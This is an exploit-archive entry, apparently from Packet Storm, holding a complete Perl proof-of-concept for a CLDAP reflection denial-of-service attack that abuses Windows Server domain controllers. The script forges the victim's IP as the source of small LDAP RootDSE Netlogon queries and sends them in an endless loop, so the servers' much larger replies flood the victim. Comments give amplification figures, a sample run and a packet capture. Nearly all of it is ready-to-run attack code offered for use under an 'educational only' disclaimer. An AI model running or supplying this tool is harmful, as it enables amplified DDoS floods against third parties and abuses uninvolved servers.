Microsoft Windows Server AD LDAP RootDSE Netlogon Denial Of Service

2016-11-04T00:00:00
ID PACKETSTORM:139560
Type packetstorm
Reporter Todor Donev
Modified 2016-11-04T00:00:00

Description

```perl
#!/usr/bin/perl
#
# MS Windows Server 2008/2008 R2/2012/2012 R2 AD LDAP RootDSE Netlogon
# (CLDAP "AD Ping") query reflection DoS PoC
#
# Copyright 2016 (c) Todor Donev
# Varna, Bulgaria
# todor.donev@gmail.com
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
# http://pastebin.com/u/hackerscommunity
#
# MS Windows Server 2016 [NOT TESTED !!!]
#
# Description:
# The attacker sends a simple query to a vulnerable reflector
# supporting the Connectionless LDAP service (CLDAP) and, using
# source address spoofing, makes it appear to originate from the
# intended victim. The CLDAP service responds to the spoofed
# address, sending unwanted network traffic to the attacker's
# intended target.
#
# Amplification techniques allow bad actors to intensify the size
# of their attacks, because the responses generated by the LDAP
# servers are much larger than the attacker's queries. In this case
# the LDAP service responses are capable of reaching very high
# bandwidth, and we have seen an average amplification factor of
# 46x and a peak of 55x.
#
#
# Disclaimer:
# This program is for educational purposes ONLY. Do not use it
# without permission. The usual disclaimer applies, especially
# the fact that Todor Donev is not liable for any damages caused by
# direct or indirect use of the information or functionality provided
# by this program. The author or any Internet provider bears NO
# responsibility for content or misuse of this program or any
# derivatives thereof. By using this program you accept the fact
# that any damage (data loss, system crash, system compromise, etc.)
# caused by its use is not Todor Donev's responsibility.
#
# Use at your own risk and for educational
# purposes ONLY!
#
# See also, UDP-based Amplification Attacks:
# https://www.us-cert.gov/ncas/alerts/TA14-017A
#
#
# # perl cldapdrdos.pl 192.168.1.112 192.168.1.146
# [ MS Windows Server 2008/2008 R2/2012/2012 R2 AD LDAP RootDSE Netlogon (CLDAP "AD Ping") query reflection DoS PoC
# [ ======
# [ Usage: cldapdrdos.pl <ldap server> <target> <port>
# [ Default port: 389
# [ Example: perl cldapdrdos.pl 192.168.30.56 192.168.1.1
# [ ======
# [ <todor.donev@gmail.com> Todor Donev
# [ Facebook: https://www.facebook.com/ethicalhackerorg
# [ Website: https://www.ethical-hacker.org/
# [ Sending CLDAP "AD Ping" packets..
# ^C
# # tcpdump -i eth0 -c4 port 389
# tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
# listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
# 00:00:58.638466 IP attacker.31337 > target.ldap: UDP, length 57
# 00:00:58.639360 IP target.ldap > attacker.31337: UDP, length 2315 ## LOOOL...
# 00:00:59.039293 IP attacker.31337 > target.ldap: UDP, length 57
# 00:00:59.041043 IP target.ldap > attacker.31337: UDP, length 2315 ## LOOOL...
# 4 packets captured
# 6 packets received by filter
# 0 packets dropped by kernel
#
# (In this capture a single 57-byte query draws a 2315-byte reply,
# i.e. roughly 40x for one datagram.)
#

use strict;
use warnings;
use Net::RawIP;   # raw IP sockets: the spoofed source address needs root

print "[ MS Windows Server 2008/2008 R2/2012/2012 R2 AD LDAP RootDSE Netlogon (CLDAP \"AD Ping\") query reflection DoS PoC\n";
print "[ ======\n";
print "[ Usage: $0 <ldap server> <target> <port>\n";
print "[ Default port: 389\n";
print "[ Example: perl $0 192.168.30.56 192.168.1.1\n";
print "[ ======\n";
print "[ <todor.donev\@gmail.com> Todor Donev\n";
print "[ Facebook: https://www.facebook.com/ethicalhackerorg\n";
print "[ Website: https://www.ethical-hacker.org/\n";

my $cldap  = $ARGV[0];          # reflector: the domain controller's CLDAP service
my $target = $ARGV[1];          # victim: becomes the spoofed source address
my $port   = $ARGV[2] || '389';

die "[ Error: <ldap server> and <target> are required!\n"
    unless defined $cldap && defined $target;
die "[ Error: Port must be between 1 and 65535!\n" if ($port < 1 || $port > 65535);

# BER-encoded LDAPMessage (57 bytes), decoded field by field:
#   30 25            SEQUENCE, 37 bytes (the LDAPMessage)
#   02 01 01         messageID 1
#   63 20            SearchRequest [APPLICATION 3], 32 bytes
#   04 00            baseObject "" (the RootDSE)
#   0a 01 00         scope baseObject
#   0a 01 00         derefAliases neverDerefAliases
#   02 01 00         sizeLimit 0
#   02 01 00         timeLimit 0
#   01 01 00         typesOnly FALSE
#   87 0b "objectclass"   filter: present(objectclass) [CONTEXT 7]
#   30 00            attributes: empty SEQUENCE
# The remaining 18 bytes (00 00, then 30 84 00 00 00 0a 04 08 "Netlogon")
# sit after the outer SEQUENCE's declared length and decode as padding
# followed by an attribute list naming "Netlogon" with a long-form
# length; the reflector answers anyway, as the capture above shows.
my $query = "\x30\x25\x02\x01\x01\x63\x20\x04\x00\x0a";
$query .= "\x01\x00\x0a\x01\x00\x02\x01\x00\x02\x01";
$query .= "\x00\x01\x01\x00\x87\x0b\x6f\x62\x6a\x65";
$query .= "\x63\x74\x63\x6c\x61\x73\x73\x30\x00\x00";
$query .= "\x00\x30\x84\x00\x00\x00\x0a\x04\x08\x4e";
$query .= "\x65\x74\x6c\x6f\x67\x6f\x6e";

my $sock = new Net::RawIP({ udp => {} }) or die "[ Error: cannot open raw socket\n";
print "[ Sending CLDAP \"AD Ping\" packets..\n";
while () {
    select(undef, undef, undef, 0.40);  # sleep 400 milliseconds between queries
    # IP source = victim, IP destination = reflector; the reply goes to the victim
    $sock->set({ ip  => { saddr => $target, daddr => $cldap },
                 udp => { source => 31337, dest => $port, data => $query } });
    $sock->send;
}
```